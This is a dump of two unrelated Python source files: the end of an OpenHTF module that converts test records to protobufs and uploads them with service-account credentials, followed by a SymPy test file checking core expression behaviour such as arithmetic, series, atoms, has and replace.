the result of the test run is available on disk and a separate process can
retry the upload when network is available.
"""
TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
SCOPE_CODE_URI = 'https://www.googleapis.com/auth/glass.infra.quantum_upload'
DESTINATION_URL = ('https://clients2.google.com/factoryfactory/'
'uploads/quantum_upload/?json')
# These attributes control format of callback and what actions are undertaken
# when called. These should either be set by a subclass or via configure.
# _converter is a callable that can be set either via set_converter method
# or by defining a _converter @staticmethod on subclasses.
_converter = None
# A default filename pattern can be specified on subclasses for use when
# saving to disk via save_to_disk.
_default_filename_pattern = None
def __init__(self, user=None, keydata=None,
token_uri=TOKEN_URI, destination_url=DESTINATION_URL):
self.user = user
self.keydata = keydata
self.token_uri = token_uri
self.destination_url = destination_url
if user and keydata:
self.credentials = oauth2client.client.SignedJwtAssertionCredentials(
service_account_name=self.user,
private_key=self.keydata,
scope=self.SCOPE_CODE_URI,
user_agent='OpenHTF Guzzle Upload Client',
token_uri=self.token_uri)
self.credentials.set_store(_MemStorage())
else:
self.credentials = None
self.upload_result = None
self._cached_proto = None
@classmethod
def from_json(cls, json_data):
"""Create an uploader given (parsed) JSON data.
Note that this is a JSON-formatted key file downloaded from Google when
the service account key is created, *NOT* a json-encoded
oauth2client.client.SignedJwtAssertionCredentials object.
Args:
json_data: Dict containing the loaded JSON key data.
Returns:
a MfgInspectorCallback with credentials.
"""
return cls(user=json_data['client_email'],
keydata=json_data['private_key'],
token_uri=json_data['token_uri'])
def _convert(self, test_record_obj):
"""Convert and cache a test record to a mfg-inspector proto."""
if self._cached_proto is None:
self._cached_proto = self._converter(test_record_obj)
return self._cached_proto
def save_to_disk(self, filename_pattern=None):
"""Returns a callback to convert test record to proto and save to disk."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'save_to_disk.')
pattern = filename_pattern or self._default_filename_pattern
if not pattern:
raise RuntimeError(
'Must specify provide a filename_pattern or set a '
'_default_filename_pattern on subclass.')
def save_to_disk_callback(test_record_obj):
proto = self._convert(test_record_obj)
output_to_file = callbacks.OutputToFile(pattern)
with output_to_file.open_output_file(test_record_obj) as outfile:
outfile.write(proto.SerializeToString())
return save_to_disk_callback
def upload(self):
"""Returns a callback to convert a test record to a proto and upload."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use upload callback.')
def upload_callback(test_record_obj):
proto = self._convert(test_record_obj)
self.upload_result = send_mfg_inspector_data(
proto, self.credentials, self.destination_url)
return upload_callback
def set_converter(self, converter):
"""Set converter callable to convert a OpenHTF tester_record to a proto.
Args:
converter: a callable that accepts an OpenHTF TestRecord and returns a
manufacturing-inspector compatible protobuf.
Returns:
self to make this call chainable.
"""
assert callable(converter), 'Converter must be callable.'
self._converter = converter
return self
# LEGACY / DEPRECATED
class UploadToMfgInspector(MfgInspector):
"""Generate a mfg-inspector TestRun proto and upload it.
LEGACY / DEPRECATED
This class is provided only for legacy reasons and may be deleted in future.
Please replace usage by configuring a MfgInspectorCallback directly. For
example:
test.add_output_callbacks(
mfg_inspector.MfgInspectorCallback.from_json(**json_data).set_converter(
test_runs_converter.test_run_from_test_record).upload()
)
"""
@staticmethod
def _converter(test_record_obj):
return test_runs_converter.test_run_from_test_record(test_record_obj)
def __call__(self, test_record_obj): # pylint: disable=invalid-name
upload_callback = self.upload()
upload_callback(test_record_obj) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O, Heaviside)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
"""
Minimal implementation of a number that works with SymPy.
If one has a Number class (e.g. Sage Integer, or some other custom class)
that one wants to work well with SymPy, one has to implement at least the
methods of this class DummyNumber, resp. its subclasses I5 and F1_1.
Basically, one just needs to implement either __int__() or __float__() and
then one needs to make sure that the class works with Python integers and
with itself.
"""
def __radd__(self, a):
if isinstance(a, (int, float)):
return a + self.number
return NotImplemented
def __truediv__(a, b):
return a.__div__(b)
def __rtruediv__(a, b):
return a.__rdiv__(b)
def __add__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number + a
return NotImplemented
def __rsub__(self, a):
if isinstance(a, (int, float)):
return a - self.number
return NotImplemented
def __sub__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number - a
return NotImplemented
def __rmul__(self, a):
if isinstance(a, (int, float)):
return a * self.number
return NotImplemented
def __mul__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number * a
return NotImplemented
def __rdiv__(self, a):
if isinstance(a, (int, float)):
return a / self.number
return NotImplemented
def __div__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number / a
return NotImplemented
def __rpow__(self, a):
if isinstance(a, (int, float)):
return a ** self.number
return NotImplemented
def __pow__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number ** a
return NotImplemented
def __pos__(self):
return self.number
def __neg__(self):
return - self.number
class I5(DummyNumber):
number = 5
def __int__(self):
return self.number
class F1_1(DummyNumber):
number = 1.1
def __float__(self):
return self.number
i5 = I5()
f1_1 = F1_1()
# basic sympy objects
basic_objs = [
Rational(2),
Float("1.3"),
x,
y,
pow(x, y)*y,
]
# all supported objects
all_objs = basic_objs + [
5,
5.5,
i5,
f1_1
]
def dotest(s):
for x in all_objs:
for y in all_objs:
s(x, y)
return True
def test_basic():
def j(a, b):
x = a
x = +a
x = -a
x = a + b
x = a - b
x = a*b
x = a/b
x = a**b
assert dotest(j)
def test_ibasic():
def s(a, b):
x = a
x += b
x = a
x -= b
x = a
x *= b
x = a
x /= b
assert dotest(s)
def test_relational():
from sympy import Lt
assert (pi < 3) is S.false
assert (pi <= 3) is S.false
assert (pi > 3) is S.true
assert (pi >= 3) is S.true
assert (-pi < 3) is S.true
assert (-pi <= 3) is S.true
assert (-pi > 3) is S.false
assert (-pi >= 3) is S.false
r = Symbol('r', real=True)
assert (r - 2 < r - 3) is S.false
assert Lt(x + I, x + I + 2).func == Lt # issue 8288
def test_relational_assumptions():
from sympy import Lt, Gt, Le, Ge
m1 = Symbol("m1", nonnegative=False)
m2 = Symbol("m2", positive=False)
m3 = Symbol("m3", nonpositive=False)
m4 = Symbol("m4", negative=False)
assert (m1 < 0) == Lt(m1, 0)
assert (m2 <= 0) == Le(m2, 0)
assert (m3 > 0) == Gt(m3, 0)
assert (m4 >= 0) == Ge(m4, 0)
m1 = Symbol("m1", nonnegative=False, real=True)
m2 = Symbol("m2", positive=False, real=True)
m3 = Symbol("m3", nonpositive=False, real=True)
m4 = Symbol("m4", negative=False, real=True)
assert (m1 < 0) is S.true
assert (m2 <= 0) is S.true
assert (m3 > 0) is S.true
assert (m4 >= 0) is S.true
m1 = Symbol("m1", negative=True)
m2 = Symbol("m2", nonpositive=True)
m3 = Symbol("m3", positive=True)
m4 = Symbol("m4", nonnegative=True)
assert (m1 < 0) is S.true
assert (m2 <= 0) is S.true
assert (m3 > 0) is S.true
assert (m4 >= 0) is S.true
m1 = Symbol("m1", negative=False, real=True)
m2 = Symbol("m2", nonpositive=False, real=True)
m3 = Symbol("m3", positive=False, real=True)
m4 = Symbol("m4", nonnegative=False, real=True)
assert (m1 < 0) is S.false
assert (m2 <= 0) is S.false
assert (m3 > 0) is S.false
assert (m4 >= 0) is S.false
def test_relational_noncommutative():
from sympy import Lt, Gt, Le, Ge
A, B = symbols('A,B', commutative=False)
assert (A < B) == Lt(A, B)
assert (A <= B) == Le(A, B)
assert (A > B) == Gt(A, B)
assert (A >= B) == Ge(A, B)
def test_basic_nostr():
for obj in basic_objs:
raises(TypeError, lambda: obj + '1')
raises(TypeError, lambda: obj - '1')
if obj == 2:
assert obj * '1' == '11'
else:
raises(TypeError, lambda: obj * '1')
raises(TypeError, lambda: obj / '1')
raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1, x)
assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1, x)
assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
assert (1/x + x).series(x, 0, 0) == 1/x + O(1, x)
assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1, x)
assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
assert (1/x**2 + 1 + x + x**2).leadterm(x)[1] == -2
assert (1/x + 1 + x + x**2).leadterm(x)[1] == -1
assert (x**2 + 1/x).leadterm(x)[1] == -1
assert (1 + x**2).leadterm(x)[1] == 0
assert (x + 1).leadterm(x)[1] == 0
assert (x + x**2).leadterm(x)[1] == 1
assert (x**2).leadterm(x)[1] == 2
def test_as_leading_term():
assert (3 + 2*x**(log(3)/log(2) - 1)).as_leading_term(x) == 3
assert (1/x**2 + 1 + x + x**2).as_leading_term(x) == 1/x**2
assert (1/x + 1 + x + x**2).as_leading_term(x) == 1/x
assert (x**2 + 1/x).as_leading_term(x) == 1/x
assert (1 + x**2).as_leading_term(x) == 1
assert (x + 1).as_leading_term(x) == 1
assert (x + x**2).as_leading_term(x) == x
assert (x**2).as_leading_term(x) == x**2
assert (x + oo).as_leading_term(x) == oo
def test_leadterm2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
(sin(1 + sin(1)), 0)
def test_leadterm3():
assert (y + z + x).leadterm(x) == (y + z, 0)
def test_as_leading_term2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
sin(1 + sin(1))
def test_as_leading_term3():
assert (2 + pi + x).as_leading_term(x) == 2 + pi
assert (2*x + pi*x + x**2).as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
# see issue 6843
n = Symbol('n', integer=True, positive=True)
r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
1 + 1/(n*x + x) + 1/(n + 1) - 1/x
assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
class foo(Function):
pass
assert foo(1/x).as_leading_term(x) == foo(1/x)
assert foo(1).as_leading_term(x) == foo(1)
raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
assert x.atoms() == set([x])
assert (1 + x).atoms() == set([x, S(1)])
assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
assert Rational(1, 2).atoms() == set([S.Half])
assert Rational(1, 2).atoms(Symbol) == set([])
assert sin(oo).atoms(oo) == set([oo])
assert Poly(0, x).atoms() == set([S.Zero])
assert Poly(1, x).atoms() == set([S.One])
assert Poly(x, x).atoms() == set([x])
assert Poly(x, x, y).atoms() == set([x])
assert Poly(x + y, x, y).atoms() == set([x, y])
assert Poly(x + y, x, y, z).atoms() == set([x, y])
assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
assert (I*pi).atoms(NumberSymbol) == set([pi])
assert (I*pi).atoms(NumberSymbol, I) == \
(I*pi).atoms(I, NumberSymbol) == set([pi, I])
assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
# issue 6132
f = Function('f')
e = (f(x) + sin(x) + 2)
assert e.atoms(AppliedUndef) == \
set([f(x)])
assert e.atoms(AppliedUndef, Function) == \
set([f(x), sin(x)])
assert e.atoms(Function) == \
set([f(x), sin(x)])
assert e.atoms(AppliedUndef, Number) == \
set([f(x), S(2)])
assert e.atoms(Function, Number) == \
set([S(2), sin(x), f(x)])
def test_is_polynomial():
k = Symbol('k', nonnegative=True, integer=True)
assert Rational(2).is_polynomial(x, y, z) is True
assert (S.Pi).is_polynomial(x, y, z) is True
assert x.is_polynomial(x) is True
assert x.is_polynomial(y) is True
assert (x**2).is_polynomial(x) is True
assert (x**2).is_polynomial(y) is True
assert (x**(-2)).is_polynomial(x) is False
assert (x**(-2)).is_polynomial(y) is True
assert (2**x).is_polynomial(x) is False
assert (2**x).is_polynomial(y) is True
assert (x**k).is_polynomial(x) is False
assert (x**k).is_polynomial(k) is False
assert (x**x).is_polynomial(x) is False
assert (k**k).is_polynomial(k) is False
assert (k**x).is_polynomial(k) is False
assert (x**(-k)).is_polynomial(x) is False
assert ((2*x)**k).is_polynomial(x) is False
assert (x**2 + 3*x - 8).is_polynomial(x) is True
assert (x**2 + 3*x - 8).is_polynomial(y) is True
assert (x**2 + 3*x - 8).is_polynomial() is True
assert sqrt(x).is_polynomial(x) is False
assert (sqrt(x)**3).is_polynomial(x) is False
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
assert Integer(1).is_rational_function() is True
assert Integer(1).is_rational_function(x) is True
assert Rational(17, 54).is_rational_function() is True
assert Rational(17, 54).is_rational_function(x) is True
assert (12/x).is_rational_function() is True
assert (12/x).is_rational_function(x) is True
assert (x/y).is_rational_function() is True
assert (x/y).is_rational_function(x) is True
assert (x/y).is_rational_function(x, y) is True
assert (x**2 + 1/x/y).is_rational_function() is True
assert (x**2 + 1/x/y).is_rational_function(x) is True
assert (x**2 + 1/x/y).is_rational_function(x, y) is True
assert (sin(y)/x).is_rational_function() is False
assert (sin(y)/x).is_rational_function(y) is False
assert (sin(y)/x).is_rational_function(x) is True
assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
assert sqrt(3).is_algebraic_expr(x) is True
assert sqrt(3).is_algebraic_expr() is True
eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
assert eq.is_algebraic_expr(x) is True
assert eq.is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
#see https://github.com/sympy/sympy/issues/3346
class MyInt:
def _sympy_(self):
return Integer(5)
m = MyInt()
e = Rational(2)*m
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
class MyInt(object):
def __int__(self):
return 5
assert sympify(MyInt()) == 5
e = Rational(2)*MyInt()
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
class MySymbol:
def __rmul__(self, other):
return ('mys', other, self)
o = MySymbol()
e = x*o
assert e == ('mys', x, o)
def test_len():
e = x*y
assert len(e.args) == 2
e = x + y + z
assert len(e.args) == 3
def test_doit():
a = Integral(x**2, x)
assert isinstance(a.doit(), Integral) is False
assert isinstance(a.doit(integrals=True), Integral) is False
assert isinstance(a.doit(integrals=False), Integral) is True
assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
raises(AttributeError, lambda: x.cos())
raises(AttributeError, lambda: x.sin())
raises(AttributeError, lambda: x.exp())
def test_args():
assert (x*y).args in ((x, y), (y, x))
assert (x + y).args in ((x, y), (y, x))
assert (x*y + 1).args in ((x*y, 1), (1, x*y))
assert sin(x*y).args == (x*y,)
assert sin(x*y).args[0] == x*y
assert (x**y).args == (x, y)
assert (x**y).args[0] == x
assert (x**y).args[1] == y
def test_noncommutative_expand_issue_3757():
A, B, C = symbols('A,B,C', commutative=False)
assert A*B - B*A != 0
assert (A*(A + B)*B).expand() == A**2*B + A*B**2
assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
a, b, c = symbols('a, b, c')
assert nan.as_numer_denom() == (nan, 1)
assert oo.as_numer_denom() == (oo, 1)
assert (-oo).as_numer_denom() == (-oo, 1)
assert zoo.as_numer_denom() == (zoo, 1)
assert (-zoo).as_numer_denom() == (zoo, 1)
assert x.as_numer_denom() == (x, 1)
assert (1/x).as_numer_denom() == (1, x)
assert (x/y).as_numer_denom() == (x, y)
assert (x/2).as_numer_denom() == (x, 2)
assert (x*y/z).as_numer_denom() == (x*y, z)
assert (x/(y*z)).as_numer_denom() == (x, y*z)
assert Rational(1, 2).as_numer_denom() == (1, 2)
assert (1/y**2).as_numer_denom() == (1, y**2)
assert (x/y**2).as_numer_denom() == (x, y**2)
assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
assert (x**-2).as_numer_denom() == (1, x**2)
assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
(6*a + 3*b + 2*c, 6*x)
assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
(2*c*x + y*(6*a + 3*b), 6*x*y)
assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
(2*a + b + 4.0*c, 2*x)
# this should take no more than a few seconds
assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
).as_numer_denom()[1]/x).n(4)) == 705
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).as_numer_denom() == \
(x + i, 3)
assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
(4*x + 3*y + S.Infinity, 12)
assert (oo*x + zoo*y).as_numer_denom() == \
(zoo*y + oo*x, 1)
A, B, C = symbols('A,B,C', commutative=False)
assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
assert (sin(x)).as_independent(x) == (1, sin(x))
assert (sin(x)).as_independent(y) == (sin(x), 1)
assert (2*sin(x)).as_independent(x) == (2, sin(x))
assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
# issue 4903 = 1766b
n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
assert (3*x).as_independent(x, as_Add=False) == (3, x)
assert (3 + x).as_independent(x, as_Add=True) == (3, x)
assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
# issue 5479
assert (3*x).as_independent(Symbol) == (3, x)
# issue 5648
assert (n1*x*y).as_independent(x) == (n1*y, x)
assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
== (1, DiracDelta(x - n1)*DiracDelta(x - y))
assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
(DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
# issue 5784
assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
(Integral(x, (x, 1, 2)), x)
def test_replace():
f = log(sin(x)) + tan(sin(x**2))
assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
a = Wild('a')
b = Wild('b')
assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
assert f.replace(
sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
# test exact
assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, b - a) == 2/x
assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
g = 2*sin(x**3)
assert g.replace(
lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
assert sin(x).replace(cos, sin) == sin(x)
cond, func = lambda x: x.is_Mul, lambda x: 2*x
assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
assert (x*(1 + x*y)).replace(cond, func, map=True) == \
(2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
(sin(x), {sin(x): sin(x)/y})
# if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
simultaneous=False) == sin(x)/y
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
simultaneous=False) == x**2/2 + O(x**3)
assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
x*(x*y + 5) + 2
e = (x*y + 1)*(2*x*y + 1) + 1
assert e.replace(cond, func, map=True) == (
2*((2*x*y + 1)*(4*x*y + 1)) + 1,
{2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
2*((2*x*y + 1)*(4*x*y + 1))})
assert x.replace(x, y) == y
assert (x + 1).replace(1, 2) == x + 2
# https://groups.google.com/forum/#!topic/sympy/8wCgeC95tz0
n1, n2, n3 = symbols('n1:4', commutative=False)
f = Function('f')
assert (n1*f(n2)).replace(f, lambda x: x) == n1*n2
assert (n3*f(n2)).replace(f, lambda x: x) == n3*n2
def test_find():
expr = (x + y + 2 + sin(3*x))
assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
assert expr.find(lambda u: u.is_Symbol) == set([x, y])
assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
assert expr.find(Integer) == set([S(2), S(3)])
assert expr.find(Symbol) == set([x, y])
assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
assert expr.find(Symbol, group=True) == {x: 2, y: 1}
a = Wild('a')
expr = sin(sin(x)) + sin(x) + cos(x) + x
assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
assert expr.find(
lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin) == set([sin(x), sin(sin(x))])
assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
expr = (x + y + 2 + sin(3*x))
assert expr.count(lambda u: u.is_Integer) == 2
assert expr.count(lambda u: u.is_Symbol) == 3
assert expr.count(Integer) == 2
assert expr.count(Symbol) == 3
assert expr.count(2) == 1
a = Wild('a')
assert expr.count(sin) == 1
assert expr.count(sin(a)) == 1
assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
f = Function('f')
g = Function('g')
p = Wild('p')
assert sin(x).has(x)
assert sin(x).has(sin)
assert not sin(x).has(y)
assert not sin(x).has(cos)
assert f(x).has(x)
assert f(x).has(f)
assert not f(x).has(y)
assert not f(x).has(g)
assert f(x).diff(x).has(x)
assert f(x).diff(x).has(f)
assert f(x).diff(x).has(Derivative)
assert not f(x).diff(x).has(y)
assert not f(x).diff(x).has(g)
assert not f(x).diff(x).has(sin)
assert (x**2).has(Symbol)
assert not (x**2).has(Wild)
assert (2*p).has(Wild)
assert not x.has()
def test_has_multiple():
f = x**2*y + sin(2**t + log(z))
assert f.has(x)
assert f.has(y)
assert f.has(z)
assert f.has(t)
assert not f.has(u)
assert f.has(x, y, z, t)
assert f.has(x, y, z, t, u)
i = Integer(4400)
assert not i.has(x)
assert (i*x**i).has(x)
assert not (i*y**i).has(x)
assert (i*y**i).has(x, y)
assert not (i*y**i).has(x, z)
def test_has_piecewise():
f = (x*y + 3/y)**(3 + 2)
g = Function('g')
h = Function('h')
p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
assert p.has(x)
assert p.has(y)
assert not p.has(z)
assert p.has(1)
assert p.has(3)
assert not p.has(4)
assert p.has(f)
assert p.has(g)
assert not p.has(h)
def test_has_iterative():
A, B, C = symbols('A,B,C', commutative=False)
f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
assert f.has(x)
assert f.has(x*y)
assert f.has(x*sin(x))
assert not f.has(x*sin(y))
assert f.has(x*A)
assert f.has(x*A*B)
assert not f.has(x*A*C)
assert f.has(x*A*B*C)
assert not f.has(x*A*C*B)
assert f.has(x*sin(x)*A*B*C)
assert not f.has(x*sin(x)*A*C*B)
assert not f.has(x*sin(y)*A*B*C)
assert f.has(x*gamma(x))
assert not f.has(x + sin(x))
assert (x & y & z).has(x & z)
def test_has_integrals():
f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
assert f.has(x + y)
assert f.has(x + z)
assert f.has(y + z)
assert f.has(x*y)
assert f.has(x*z)
assert f.has(y*z)
assert not f.has(2*x + y)
assert not f.has(2*x*y)
def test_has_tuple():
f = Function('f')
g = Function('g')
h = Function('h')
assert Tuple(x, y).has(x)
assert not Tuple(x, y).has(z)
assert Tuple(f(x), g(x)).has(x)
assert not Tuple(f(x), g(x)).has(y)
assert Tuple(f(x), g(x)).has(f)
assert Tuple(f(x), g(x)).has(f(x))
assert not Tuple(f, g).has(x)
assert Tuple(f, g).has(f)
assert not Tuple(f, g).has(h)
assert Tuple(True).has(True) is True # .has(1) will also be True
def test_has_units():
from sympy.physics.units import m, s
assert (x*m/s).has(x)
assert (x*m/s).has(y, z) is False
def test_has_polys():
poly = Poly(x**2 + x*y*sin(z), x, y, t)
assert poly.has(x)
assert poly.has(x, y, z)
assert poly.has(x, y, z, t)
def test_has_physics():
assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
f = x**2 + 2*x*y
assert f.as_poly().as_expr() == f
assert f.as_poly(x, y).as_expr() == f
assert (f + sin(x)).as_poly(x, y) is None
p = Poly(f, x, y)
assert p.as_poly() == p
def test_nonzero():
assert bool(S.Zero) is False
assert bool(S.One) is True
assert bool(x) is True
assert bool(x + y) is True
assert bool(x - x) is False
assert bool(x*y) is True
assert bool(x*1) is True
assert bool(x*0) is False
def test_is_number():
assert Float(3.14).is_number is True
assert Integer(737).is_number is True
assert Rational(3, 2).is_number is True
assert Rational(8).is_number is True
assert x.is_number is False
assert (2*x).is_number is False
assert (x + y).is_number is False
assert log(2).is_number is True
assert log(x).is_number is False
assert (2 + log(2)).is_number is True
assert (8 + log(2)).is_number is True
assert (2 + log(x)).is_number is False
assert (8 + log(2) + x).is_number is False
assert (1 + x**2/x - x).is_number is True
assert Tuple(Integer(1)).is_number is False
assert Add(2, x).is_number is False
assert Mul(3, 4).is_number is True
assert Pow(log(2), 2).is_number is True
assert oo.is_number is True
g = WildFunction('g')
assert g.is_number is False
assert (2*g).is_number is False
assert (x**2).subs(x, 3).is_number is True
# test extensibility of .is_number
# on subinstances of Basic
class A(Basic):
pass
a = A()
assert a.is_number is False
def test_as_coeff_add():
assert S(2).as_coeff_add() == (2, ())
assert S(3.0).as_coeff_add() == (0, (S(3.0),))
assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
